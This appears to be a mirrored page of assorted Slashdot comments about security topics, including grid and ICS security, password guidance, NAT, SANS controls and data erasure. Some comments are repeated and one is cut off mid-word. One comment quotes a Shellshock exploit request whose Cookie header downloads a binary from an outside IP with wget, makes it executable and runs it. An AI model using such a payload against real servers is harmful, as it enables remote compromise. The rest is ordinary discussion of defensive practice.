Slashdot Mirror

easy walk them through this poster from left to right https://uk.sans.org/security-r...

You would be surprised at the dumb shit I have seen in dealing with securing similar systems. Yes it is layer upon layer of security measures, or it should be. But far too often someone forgets about that ancient tape changer in storage room b-37 that is still connected, or some PHB decides that they want to be able to check in on machines and shut them down from their cellphone while at home.

One of the problems with ICS systems and others like them is that they assume that the operator knows what they are doing as most of the time the people who are running these things do. The problem occurs when someone who isn't competent, or is malicious wants to do something else. Here the system may warn them before but will let them do it anyway, unless it was a known bad configuration when initially programed but this often is far too big of a state space to program for. Yes there are mechanical limits put on the machine but that doesn't mean it isn't possible to create an unsafe set of settings as was done with the aurora generator test where it was brought out of phase with the rest of the grid. Under normal operation that would have been impossible but by toggling things correctly it became possible to bring it out of phase. This took a bunch of very smart people to figure out the right sequence of events so while it isn't something that could be done easily it could be and with cellphone apps becomes more likely. That said of all the things to worry about this is very low on the list, unless it is your job, and instead would worry more about squirrels.

Also you seem to have forgotten about the whole Stuxnet incident and other related and similar attacks. All of which were able to abuse equipment. Of course there was the attack against the Ukrainian power grid a little more than 2 years ago too. So I stand by my statement that very often this is overblown in the media who love spreading FUD, there is a nugget of truth hidden there and people who have to deal with these systems need to pay attention.

NIST recently published its four-volume SP800-63b Digital Identity Guidelines . Among other things, it makes three important suggestions when it comes to passwords:

1. Stop it with the annoying password complexity rules. They make passwords harder to remember. They increase errors because artificially complex passwords are harder to type in. And they don't help that much. It's better to allow people to use pass phrases.
2. Stop it with password expiration. That was an old idea for an old way we used computers. Today, don't make people change their passwords unless there's indication of compromise.
3. Let people use password managers. This is how we deal with all the passwords we need.

These password rules were failed attempts to fix the user. Better we fix the security systems.

I see someone has no idea of what they are talking about in this regard. Here is the current standard that grid operators have to comply with. Also here is what is currently being asked of suppliers by the grid operators when getting a new system. Add in that the systems be benchmarked against these or these is also becoming written into the contracts now. I would assume that operators in the oil and gas industry either have similar things or are at least smart enough to re-purpose the above as the effort to do so would be minimal. A lot of the security efforts for securing the grid are not to protect it from the general internet, they are already separated and if not the company fucked up really bad and if NERC finds out the company will be paying some huge fines so let NERC know. Instead the security is to protect the control system from stupid users who find a USB rubber ducky in the parking lot, connects their corporate laptop to the control network, someone doing malicious things out at some remote substation that then gets into the main control system, or malicious insider. The people going after the grid are professionals and more often than not state actors not little Timmy from down the street who just found out about Low Orbit Ion Cannon or Armitage.

Probably except for the part about not storing personal information but then they aren't card processors. The PCI standard while it is a standard is really the bare minimum that companies should be held to for them to not be found guilty of criminally negligence for breaches. The actual standard is here and having had to deal MBAs asking about our compliance makes it seems like it is something written for the MBA types to check off a bunch of stuff. There are much better standards and if you aren't an MBA you can figure out how to make them applicable to your business. Personally I like the NERC CIP standard with liberal utilization of the CIS benchmarks as a good starting point for securing a system. If you want others there is always the US government's set of security benchmarks, the DoE document Cybersecurity Procurement Language for Energy Delivery Systems, or a bunch of stuff at the SANS site that you could use as a guide.

In the US if a power company loses computer control of their portion of the grid they still get the joy of rolling trucks out to substations and other locations to maintain control. An interesting thing about the Russian hack of the Ukrainian grid is that the Russians also DoSed the call center to prevent the outages from being reported sooner. Like with any number of cyber attacks there were multiple ways that this should have been stopped but wasn't. One can read all about findings either here or here for good analysis of what happened. Besides if people think a cyber attack against the power grid is the greatest threat they should consider those bastard squirrels instead. If one really wanted to do some damage discharging a high powered rifle (think .30-06 deer rifle) into some of those large transformers at substations would be easier and cause a longer outage than a cyber attack as there just aren't many spares around.

That isn't to say don't worry about cyber attacks and don't mitigate things but there are a lot of other threats that are as damaging or more so that should also be prepared for.

They didn't dance along the edge of legality. They danced over and never looked back. Legitimate pen test services are painfully aware of this and have the paperwork to prove it.

Ars should have enough sense to check things out for the sake of their own credibility. If Ars Technica bothered to ask anybody who's ever worked in the security industry they would have quickly learned the indemnification is taken very seriously.

http://www.isaca.org/chapters3...
https://pen-testing.sans.org/b...

Hell, even metasploit has been talked about this for years!
https://dev.metasploit.com/pip...

The only people fooled by Gizmodo's phishing logic were the editors who signed off on this to begin with. Next time ask a pro before you publish, it will help you avoid looking the fool.

But a whitelist requires more diligence to maintain if you don't want to turn a PC into a game console

A whitelist is a gateway to an app store only system with censorship and lack of choice.

That's sort of what I was getting at. It really depends on by whom it's managed. Some PC owners can be trusted to maintain their own whitelist; others can't.

[1] Thomas U. P. Charlton. The Life of Major General James Jackson. Augusta: Randolph & Co., 1809.

The problem with this vulnerability is that it provides yet another mechanism for lateral movement within a compromised network. See, e.g., Killing Advanced Threats in Their Tracks: An Intelligent Approach to Attack Prevention.

Just thinking this isn't a problem because "no one exposes SMB ports" is missing the point. This can be very bad. Think about what happened to Sony -- hackers got in, moved data around, and spent their time, using various exploits. This is one that could be very helpful in such an attack.

Why is giving law enforcement agencies access to data always referred as a backdoor?
egulations-standards-encryption-applies-34675 - have a look at this document.
Is it because it conjurers up the image of a key left under the door matt that anyone could stumble across and then use to let them themselves in and steal all of your property?
Let's take the example of Apple's iMessage which uses end to end encryption. Apple generates the encryption keys, they are the key holders. In theory they could give those keys to the NSA who would then have real time access to messages.
iCloud- Apple can gain access to phone back ups whenever they want.
(Fell free to replace the word Apple with Google or Microsoft if you prefer).
But those obvious weak points, which could be exploited by criminals, are never referred to as backdoors, why?
technology essay topics – featuring encryption law drawbacks.

With the big RSA security conference on the horizon, expect to see lots of stories about the latest security solutions, especially from start ups.

If you want good security, work on implementing the SANS Top 20 security controls instead of looking for a silver bullet.

*Update* A cyber analyst in Israel (Eyal Sela) messaged me to add that the media reporting so far is misleading with regards to the context around the incident. The "Israel Electric Authority" the Minister mentioned is in no way related to the networks of the Israeli electric companies, transmission, or distribution sites. The Israeli Electric Authority is a regulatory body of roughly 30 individuals and this "cyber attack" is only referencing their networks. The original purpose of this blog was to stress caution to the reports but did not try to dispel what the Minister of National Infrastructure, Energy, and Water resources had stated as reporting was too early with no evidence presented. However, new reporting shows that the "cyber attack" was simply ransomware delivered via phishing emails to the regulatory body's office network and it appears in no way endangered any infrastructure.This once again stresses the importance around individuals and media carefully evaluating statements regarding cyber attacks and infrastructure as they can carry significant weight.

As provided elsewhere here is some more information on what was actually found.

For those looking for some more info on the attack you can find it here. It is basically what some investigators have uncovered thus far and as a bonus it isn't in Ukrainian.

For starters, I have read up on it, and many many vendors agree that it IS security.
Sources:
Cisco (Top 2 paragraphs of intro)
http://www.cisco.com/web/about...
SANS institute (Page 5, 2nd paragraph)

And so on.

As to your solution, it has a massive issue. Route tables must use next hops as their gateway; you could not enter a command like that targetting my WAN, and have it work, because my WAN IP would not be a next hop for your computer. The only thing your route table can do is instruct your computer which IP on your broadcast domain will be willing to handle your datagrams. At that point, it is up to that router to figure out the next hops.

You will note I asked you what the L3 / L4 headers would be on your packet; this was specifically to demonstrate why such attacks would fail. You would have a source address of 9.9.9.9, and a destination of 192.168.50.5, and you would instruct your computer to pass that datagram off to a router at ethernet address 99:99:99:99:99:99 (your router), and he would promptly vomit and say "what the hell I cant route an RFC1918". Add the route on your router, and you've shoved the issue back to your ISP, whose router would either fail to find a route for that subnet, or (more likely) outright reject it as a violation of RFC.

The only scenario in which this attack makes sense is when the attacker IS the next hop, that is your ISP. And for 99.999% of users, this is not a realistic threat model they will face, and NAT will be "acceptable" security.

No one argues that a stateful firewall is BETTER (as it prevents attacks like you mentioned), but to say that NAT adds no security whatsoever is being silly; major infrastructure vendors disagree with you.

http://www.sans.org/instructor... Mike Poor has been saying this for years

No, that doesn't follow at all. Firefox was a significantly better browser at the time, before they jumped the shark after version 4.

Your disagreement seems to be looking from now backwards instead of from the beginning. Since Firefox was named specifically, it's a browser that wasn't released until 3 years after (4 excluding the technology previews) the competition.

Better is such a subjective word, better how? Stability? That eliminates technology previews bumping the "better" browser back another year. I sincerely hope something developed years after its competition was released would improve upon established norms. Out of the gate it was feature incomplete by their own version numbers. Steve Jobs is one who can make that a compelling argument. Firefox also featured some really cool fundamental concepts, like the now ubiquitous download manager.

Firefox became competitive in 2005/2006. Prior to that IE was top dog, when IE6 was released it was better than the other browsers by means of features like standards support and speed. Prior to the JavaScript engine wars fundamentally changing things, there were incremental steps. IE6 believe it or not was peppy compared to Netscape's offerings. This is documented in Netscape Navigator's decline. IE6 at the time it was released and for many years was what the vast majority of designers targeted and designed for. Designed for Internet Explorer, Designed for Netscape Navigator were prevalent like perverse badges of honor. In my opinion the debut of Firebug in 2006 was a turning point for designer/developer interest considering many tools are heavily inspired by its features. Here's a neat little read on IE1.0 upto Firefox 2.0.

I never claimed there was only _one_ tool. You sure love to jump to conclusions about things I never said. There was another utility I used to use back in the day too, it might have been MultIE. I've deleted / removed almost everything related to IE.

The way you mentioned it was, paraphrasing: "Sandboxie was really annoying." So is installing Steam games into it and so is supporting dozens of viewport sizes. Welcome to software!

You're missing the point. Microsoft popularized that crap. Just because other vendors are doing it doesn't give MS a free pass.

I feel like somewhere in your secret volcano lair there exists a giant whiteboard which has a soul crushing flowchart with winding complex paths leading to the giant Sauron like cloud labeled "Microsoft: Great Satan". At some point the responsibility shifts to the shoulders of those who take action.

There is evidence that this is being exploited in the wild.
Nginx and Apache servers using mod_cgi are two potentially vulnerable services.

The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.

An example attack:

GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;

Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and and a have a simple one-liner to test if a system is vulnerable.

You might consider http://www.sans.org/ training classes/conferences. They're mostly focused on security, so that has to fit for you, but I've learned a lot in both of the classes/conferences I've attended with them.

One thing you're not considering is that in a Windows Active Directory domain machines cache the users' passwords. These caches are stored locally on the system to allow logons if a domain controller is not accessible- a necessity for many users with a lapotp. If a users machine is compromised with a phishing/watering hole attack that gets the attacker one account. If that can be used to to access a terminal server, that can lead to many more accounts, and probably a privileged administrative account as well.

Two factor authentication helps with these problems, and sometimes the password complexity requirements you hate can help to. Here is an article about how insecure the local caches Windows creates are: http://digital-forensics.sans....

http://digital-forensics.sans....

your choice is between kerberos support (to join an ad domain), or having your plaintext password stored in memory and extractable with mimikatz (which would be a violation of virtually every security standard ever written but ms seem to get a free pass), they are very much related.

and yes hash passing is ad related too, because it uses authentication protocols which are vulnerable to such attacks. sure it can use others too like ldap, but is it ever actually configured that way? and is it possible to make windows clients join the domain only using ldap for auth?

When people talk about USB flash drives 'self destructing' they presumably mean that the flash memory gets completely erased rather than blow to bits with explosives.

E.g. with a flash chip you could just loop through all the physical blocks and erase them. With a SATA drive you could do a secure erase of the whole device. That could take some 30 minutes to 1 hours. However if you power cycle the device it will just restart until the process completes

http://computer-forensics.sans.org/blog/2011/01/25/digital-forensics-erasing-drives-quick-easy

A full erase using SE can take 30 minutes to over an hour to complete. The thing is that the drive will restart the wipe if it is power cycled. So just restarting the host will not stop the process.

Another option would be to encrypt the data with AES with a random key. When you need to self destruct just erase the flash memory containing the key. So you've still got the data it's just incomprehensible.

Hello, potential Russian/Chinese shill! It is a speculative claim, not a proven claim. For all we know they selected it to be resistant to some particular attack. If that is the case, your "no proof needed" assertion leads everyone off a cliff.

Are you calling Linear attack against DES feasible? It take 2**43 known plaintext/ciphertext pairs!
https://www.sans.org/reading-room/whitepapers/vpns/s-box-modifications-effect-des-like-encryption-systems-768

First, read this:

Knuth: The Art of Computer Programming, Volumes 1-4A Boxed Set
http://www.amazon.com/Computer-Programming-Volumes-1-4A-Boxed/dp/0321751043

Then read this:
https://www.sans.org/top25-software-errors/

Everything else is a niche.

I have been doing IT for 30 years. I have been doing Security for a University for about the last 15 years. I have found that security is possible, but you have to focus.

The biggest problem is we are not taught how to do security. We are taught attack. But attack is not security. We are taught checklists, but checklists are not security.

Security is a meaningful assurance that your goals are being accomplished. The details are transitory. But, without goals, security has no point. Sticking to your goals when attacked is the heart of defense. Ultimately, it is the only thing that matters in security. Your organization adds value by sticking to it's goals. But this is more than just a matter of value added. Goals are the spirit of the organization. If you don't stick to your goals when attacked, then you have lost. The attacker may not have won, but you have lost.

But, security folks are not taught how to support institutional goals. Instead, we are taught myriads of other things. You can see examples of the mechanics of security defeating meaningful security all over the place. One striking example is the SANS 20 Critical Controls: http://www.sans.org/critical-security-controls/ While they contain many good points, they fail to teach security. When we analyzed them, we found that they tended to replace security process with checklist. When we had finished the evaluation process we had eliminated, reordered and replaced many of their controls. Our most important control was not even mentioned. It is:

Critical Control 1: Unity of Vision

Security is a MEANINGFUL Assurance that YOUR goals are being Accomplished. Most security failures are enabled and enhanced by disagreement of purpose. Are the fundamentals of management in place?

• A. How does your organization create a sense of community?
• B. What are your Institution's Goals?
• C. How are those goals propagated throughout the organization?
• D. How do your security actions promote your institutional goals?
• E. How do your security actions provide assurance to your institution?
• F. How does your institution reward long term loyalty?

Another glaring omission is the complete lack of strategic thinking in the security community. Winning battles, but loosing the war is our way of life. Nothing in the SANS controls guides you to ask the important questions like: "Were am I going?" and "How did I get in this handbasket?" and "Do I HAVE to eat this crap?" For our analysis of the SANS Controls, we added another Control. We valued it at number 3:

Critical Control 3: Enable a Better Future

This control assumes that our actions affect the future. Do your actions enable a more secure future?

• A. How do you increase the cost of attack?
• B. Do you report attack to the remote ISP/attacker?
• C. How do you coordinate with law enforcement?
• D. How do you decrease the cost of defense for yourself and others?
• E. How do you reduce the motivation for local attack?
• F. Do you disclose vulnerabilities to others? If so, will your institution protect it’s people when others attempt to punish disclosure?
• G. Do you facilitate others disclosing vulnerabilities to you?
• H. Do you help your peers improve their security?

The SANS 20 Controls were originally written by the NSA for the Department of Defense: http://www.sans.org/critical-security-controls/history.php The recent NSA disclosures make me wonder if maybe they are flawed, because the NSA simply doesn't value effective security?

I have been doing IT for 30 years. I have been doing Security for a University for about the last 15 years. I have found that security is possible, but you have to focus.

The biggest problem is we are not taught how to do security. We are taught attack. But attack is not security. We are taught checklists, but checklists are not security.

Security is a meaningful assurance that your goals are being accomplished. The details are transitory. But, without goals, security has no point. Sticking to your goals when attacked is the heart of defense. Ultimately, it is the only thing that matters in security. Your organization adds value by sticking to it's goals. But this is more than just a matter of value added. Goals are the spirit of the organization. If you don't stick to your goals when attacked, then you have lost. The attacker may not have won, but you have lost.

But, security folks are not taught how to support institutional goals. Instead, we are taught myriads of other things. You can see examples of the mechanics of security defeating meaningful security all over the place. One striking example is the SANS 20 Critical Controls: http://www.sans.org/critical-security-controls/ While they contain many good points, they fail to teach security. When we analyzed them, we found that they tended to replace security process with checklist. When we had finished the evaluation process we had eliminated, reordered and replaced many of their controls. Our most important control was not even mentioned. It is:

Critical Control 1: Unity of Vision

Security is a MEANINGFUL Assurance that YOUR goals are being Accomplished. Most security failures are enabled and enhanced by disagreement of purpose. Are the fundamentals of management in place?

• A. How does your organization create a sense of community?
• B. What are your Institution's Goals?
• C. How are those goals propagated throughout the organization?
• D. How do your security actions promote your institutional goals?
• E. How do your security actions provide assurance to your institution?
• F. How does your institution reward long term loyalty?

Another glaring omission is the complete lack of strategic thinking in the security community. Winning battles, but loosing the war is our way of life. Nothing in the SANS controls guides you to ask the important questions like: "Were am I going?" and "How did I get in this handbasket?" and "Do I HAVE to eat this crap?" For our analysis of the SANS Controls, we added another Control. We valued it at number 3:

Critical Control 3: Enable a Better Future

This control assumes that our actions affect the future. Do your actions enable a more secure future?

• A. How do you increase the cost of attack?
• B. Do you report attack to the remote ISP/attacker?
• C. How do you coordinate with law enforcement?
• D. How do you decrease the cost of defense for yourself and others?
• E. How do you reduce the motivation for local attack?
• F. Do you disclose vulnerabilities to others? If so, will your institution protect it’s people when others attempt to punish disclosure?
• G. Do you facilitate others disclosing vulnerabilities to you?
• H. Do you help your peers improve their security?

The SANS 20 Controls were originally written by the NSA for the Department of Defense: http://www.sans.org/critical-security-controls/history.php The recent NSA disclosures make me wonder if maybe they are flawed, because the NSA simply doesn't value effective security?

In IP telephony packet loss is unacceptable. The performance of an IP call will suffer greatly if packet loss occurs. The quality of the conversation will lag if packet loss reaches more than 5%

From experience, 5% packet loss would make for a completely unacceptable level of quality. At least relative on the level of service I provide.

Delays in voice traffic create gaps in the transmission that may be heard by the receiver, resulting in unhappy customers. QOS technology features concrete priority service to voice traffic to establish predictable delivery. Usually small in size, transmission of voice packets range from 80 to 256 bytes. Unless QOS techniques are used such voice packets can be delayed between larger data packets. QOS techniques used are packet fragmentation and interleaving. One of the crucial technical issues with QOS is that in order to be effective it must be supported end-to end. For VoIP to be of functional quality the network should essentially have a bare minimum data rate and bounded delay variation.

If QoS mechanisms are supported on only portions of the network there are no guarantees that the traffic will get the handling end-to-end that is necessary to achieve success.

Check this out also as a guide to security. All 20 need not be implemented, just the ones pertinent to your organization.

CSIS: 20 Critical Security Controls Version 4.1
http://www.sans.org/critical-security-controls/?utm_campaign=resources&utm_source=featured&utm_medium=web&utm_content=critical_controls

A few days ago I bought a 2TB Western Digital hard drive, which uses the newer 'Advanced' (4KB) sector format and an emulation layer (in controller firmware) to present normal 512-byte sectors to the host. To avoid a massive performance hit, the drive has to be partitioned using WD's special sector-alignment software - an 80MByte (Windows-only) download with mandatory account registration and validated email address.

What massively fancy, complex thing does this 80MB worth of software do? Move all the partitions forward by 1 sector. Yes, literally! (For legacy reasons, most disk utilities partition a HD with a 63-sector offset; the alignment utility moves it to 64 so that all disk structures will align on 4KB boundaries.)

(Why not just ship the drive with a default 4k-aligned partition? Where's the money in that?)

The only thing AV provides is a false sense of security. With AV, you're waiting until AFTER an infection occurs and then HOPING the AV company you've chosen has A) seen the malware before, B) bothered to add a signature to their definitions list, and C) is actually capable of removing the virus.

Better ideas: Turning on AppLocker & running most of the time as an unprivileged user. Check out OSSEC for use as a File Integrity Monitor and Host-based Intrusion Detection System. Disable unnecessary services, remove unnecessary programs, use an ad-blocker, a "default deny all" firewall policy and get a 3rd party patch manager to keep all your non-MS bits up to date. Secunia PSI is a free patch manager/vuln scanner for home use - there are others.

For a detailed description of just how bad AV is at protecting systems, check out the following blog post at computer-forensics.sans.org:
http://computer-forensics.sans.org/blog/2012/04/09/is-anti-virus-really-dead-a-real-world-simulation-created-for-forensic-data-yields-surprising-results

http://computer-forensics.sans.org/blog/2009/01/15/overwriting-hard-drive-data/ has some experimental stats on recovering known bits of data from drives. Note "bits" - longer strings have rapidly diminishing probability of getting anything back.

Back in the old days of floppy disks, though, it was fun to demonstrate recovery of data, especially when they had been written on a 40-track drive and read on an 80-track drive.

There is more risk if the cracker obtains access to your actual device, but that person must have significant forensic skills and software, and extracting the app data might take an inordinately long time

There are specific forensic devices which do this automatically and are available to the kinds of people who run organisations where stolen iPhones end up, not to mention large foreign competitors of the type of people who need and care about password safes and governments. These machines fully automate these attacks.

If you use iCloud for backups or have a strong, secret iTunes backup password, your device backups aren’t vulnerable.

Serious security concerns have been raised against iCloud by people with more security knowledge than myself. Also I am not aware of a serious outside audit with published results. I would not be prepared to accept this statement without much further research and access to Apple's design and implementation information.

If locked, the passcodes used by the iPad 2, third-generation iPad, and iPhone 4S are entirely secure unless the device was jailbroken before being locked.

In my experience, problems such as USB/Wireless etc. etc. exploits have always found ways to work around this security. Could you please give a bit more basis for this belief?

Simply put, good security should be made up of different layers where the failure of one layer will not lead to the others failing. I do not find the general security of iOS to be sufficiently convincing to consider running an insecure password manager on it a good idea.

Internet Storm Center. Apparently it has been up for quite a while. What bright lights of wonder Microsoft hides under their bushel! I wonder what else there is.

I've heard things about SANS, though I've never taken a course from them. They do have some courses on web development. Even if you can't afford to take one of their courses, you might look through the content brief to see what it covers and what areas you should be looking at, or find someone who's taken the course and ask what was covered.

And every user with admin privileges can re-enable those settings any time they want. The auto run is only one USB issue; there are several others.

Perhaps you should read at least one paper on USB security issues before you deem them safe. Here is one http://www.sans.org/reading_room/whitepapers/threats/usb-ubiquitous-security-backdoor_33173

They would fold the letter over on itself, and seal it with wax, often with a characteristic indentation from a stamp. Although the Wikipedia page for sealing wax disputes that arrival date for envelopes ; it has them arriving in the 16th century.

And of course, people freely use email with an expectation of privacy but are ignorant that it's akin to sending a postcard via an association of disreputable postmen, not limited to thieves, spies, secret police, and salesmen, and that each of them must read the postcard to be able to pass it onwards. The envelope icon present in the GUI of most modern email programs is pretty misleading from this point of view.

People have been using encryption methods for thousands of years though. But only the elite. It would seem the common man really does believe he has nothing to hide...

A virus will initiate at least one outbound connection.

Not necessarily - A clever virus could be using side channel communication and have modified a expected connection.
See also http://www.sans.org/reading_room/whitepapers/detection/covert-channels_33413

Difficult and probably hard to implement, but as long as the server does any legit outbound connections the virus could transmit data there.
(DNS lookups, TCP/UDP and IP header modifications. The options are many)

An air gap'ed network as other posters are describing would make this more or less impossible (or, at least, impractical).

Start reading the SANS (SysAdmin, Audit, Network, Security) newsbites. (Sign up at http://portal.sans.org/)

The depressing reality is that most security money these days is spent filling out paperwork, and getting exemptions where you don't meet the standards. That coupled with the fact that there's simply much, much, more stuff online now, makes hacking easier.

It has been previously reported that steganography porn is used by Islamic terrorists and it must be true as I read it on the Internet ...

Link between child porn and Muslim terrorists

link

Obviously it was a security breach, which is why they called the SANS institute to help figure it out.

http://computer-forensics.sans.org/blog/2009/02/04/what-happens-when-you-overwrite-data/

That paper is garbage. I've seen it referenced before only when used to debunk this idea. Wish could find those threads.

Call a data recovery place and ask. They will say they the over written data will not be recovered, but they will see what they can do if you are in a position where the attempt much be made.

Hunh? What's "Hurt Locker"? First I'd heard of it.

Oh, a film that offers me no appeal, from what I've "seen" so far, which is just the /. commentary. Oscars don't cut it as a recommendation, any more. Attacking the public REALLY doesn't cut it, even when it is proported to be defensive. So can we expect some "accidental" leak of all the "pirates"' personal info, somewhere in this, as well? Perhaps in PDF court documents? (see SANS stormfeed about new PDF & Flash vulns http://isc.sans.org/diary.html?storyid=9487 and "SDF" http://isc.sans.org/diary.html?storyid=9490)

Hunh? What's "Hurt Locker"? First I'd heard of it.

Oh, a film that offers me no appeal, from what I've "seen" so far, which is just the /. commentary. Oscars don't cut it as a recommendation, any more. Attacking the public REALLY doesn't cut it, even when it is proported to be defensive. So can we expect some "accidental" leak of all the "pirates"' personal info, somewhere in this, as well? Perhaps in PDF court documents? (see SANS stormfeed about new PDF & Flash vulns http://isc.sans.org/diary.html?storyid=9487 and "SDF" http://isc.sans.org/diary.html?storyid=9490)

Although I prefer the classroom courses, SANS security course are very practical. They will help you both with your job and in getting a job. http://www.sans.org/vlive/

A lot of your argument is based on making a random assumption

I don't think it's random or unprecedented. Moreover, you haven't demonstrated it to be false -- it may be difficult to implement. HTML5 evidently is not.

You've also outright ignored several important points I made:

Have they actually opened the spec to the point where third-party players are feasible? Last I checked, the spec was open for creating content, but not playing it....the DRM'd stuff is not and never has been open, so I can't duplicate that -- and Hulu is using that. So either you're wrong about Flash being open, or you're offtopic, take your pick.

You didn't answer either of those points. You handwaved about third-party players existing, but that doesn't tell me whether or not they're allowed to read the specs yet -- again, the specs were open to third-party content creation tools for awhile, but not players, for some perverse reason.

On to your arguments...

There are half a dozen working, competing, incomplete implementations of Flash, and many fully fledged production cross-browser apps on top of it.

Citation needed.

In brief, because they're web browsers, and their remit is to implement W3C's HTML spec, not to write it. Other motives include Google's dream of holding all your data and serving everything via Javascript....

While true, it's still entirely up to a browser to simply refuse to implement a spec. In particular:

MS, as usual, is just paying lip service in the hope of preserving browser marketshare.

That raises the question of why they would implement the video tag, but not canvas?

The point here is that there are other players than Apple -- other contributors to the spec than Apple -- and more to HTML5 than video. Your claim that this is just because Apple doesn't like Flash is wrong on many levels.

No, not at all. I don't see lots of iApps being written in the "entirely open HTML5",

Mostly because then they're not iApps anymore. Then they're just web apps, which happen to work on Apple devices, but also work in any decent browser.

So how would you know?

And years 4 to 9 of the web were awash with huge imagemaps which everyone hated and which were soon replaced with smarter HTML as people accepted that an img was for an image, not for intelligence.

What? No, people still do things with images, though not to that extent. We still have mouseovers, at the very least. Images are used in place of buttons for interaction, and they're used as indicators and such all over the place. We've even got tricks with "sprite maps", where a single image file is manipulated through CSS to appear as multiple tiny icons as needed throughout the page.

More relevantly, you talk about "smarter HTML" -- I asked how an effect which is possible today with Canvas could be duplicated with SVG, and your response was to denigrate the effect. Apparently, smarter HTML, or smarter SVG, isn't really possible at this point.

video is a not entirely insane tag, but it appears in HTML5

That's like refusing to use HTML because it once contained the blink tag.

It's as modular as you pretend HTML can be, i.e. you could make a non-conforming implementation leaving out as many features as you want.

What no one has done yet is to create a competing, conforming implementation. That's the prerequisite -- leaving shit out isn't modularity. Modularity is being able to add and remove features at will, and for that to work, you need to have all the features at some point.

Bullcrap. The browsers themselves are the single biggest attack vectors,

The numbers disagree. Including the browser, most atta

Method for spoofing an IP: http://en.wikipedia.org/wiki/SYN_flood
Method for preventing original IP from connecting: http://en.wikipedia.org/wiki/SYN_flood
Proof of concept code ARP + SYN: http://perl-code.blogspot.com/2008/04/arp-poison-syn-flood-with-random.html
Real life example of ARP spoofing on comprised servers: http://isc.sans.org/diary.html?storyid=6001

Not likely to be used for P2P, but in the realm of possibilities. I would not be surprised if all the content providers they found are just proxies, legit or pwned.

"I've never had any of my computers, running Mac/Windows infected by anything that I know of, I don't use any sort of protection either..."

Well there's you're problem right there. If you're running Windows and connecting it to the net, it is infected as a matter of course whether you choose to become aware of it or not. The only way to prevent it, is to not use Windows.

So on behalf of all the Fortune 500 companies, for whom I do not represent, and on behalf of all the rest of us, whom I don't represent either, who feel the pinch from there elevated operational costs may I be the first to extend a heartfelt, sincere "FUCK YOU, VERY MUCH" to you and any horse you might have ridden in on.

Put SVChost.exe back in place (out of the quarantine )

and disable McAfee...

You hawks would be funny if some of you didn't hold power.

Some media file can pop up a browser window to an infected site that will install malware on your computer especially if you use older software versions.

There was even gif and jpeg exploits made public in the past, it probably occurred with other media files as well...

http://isc.sans.org/diary.html?storyid=2997

http://news.netcraft.com/archives/2004/09/17/exploit_for_microsoft_jpeg_flaw_is_published.html